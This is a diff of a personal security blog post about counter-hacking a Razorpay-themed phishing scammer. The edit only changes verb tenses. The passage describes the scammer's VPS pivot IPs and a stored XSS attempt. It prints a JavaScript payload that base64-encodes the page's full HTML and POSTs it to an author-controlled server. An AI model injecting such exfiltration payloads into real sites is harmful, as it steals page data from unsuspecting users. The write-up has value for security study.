A3h1nt/a3h1nt.github.io/_posts/2024-12-10-Hacking The Razorpay Phishing Scammer.md

 Both the IPs had RDP and OpenVPN enabled, they are most likely a VPS server as suggested by a friend of mine, used as a pivot point to prevent revealing their real IPs.

-Post this, i kinda hit a wall, i tried multiple things around leveraging XSS to get more data, one such attempt worth mentioning was, base64 encoding the current HTML document and sending it over to a server controlled by me.
-In this manner, if the data was loaded anywhere else, in any other document, it would've given me the entire HTML document, which could've provided more information to play with.
+Post this, i kinda hit a wall, i tried multiple things around leveraging XSS to get more data, one such attempt worth mentioning is, base64 encoding the current HTML document and sending it over to a server controlled by me.
+In this manner, if the data is loaded anywhere else, in any other document, it would give me the entire HTML document, which could provide more information to play with.

 ```js
 <script>const xhr = new XMLHttpRequest();xhr.open('POST', 'https://my-server/data');xhr.send(btoa(escape(encodeURIComponent(document.documentElement.outerHTML))));</script>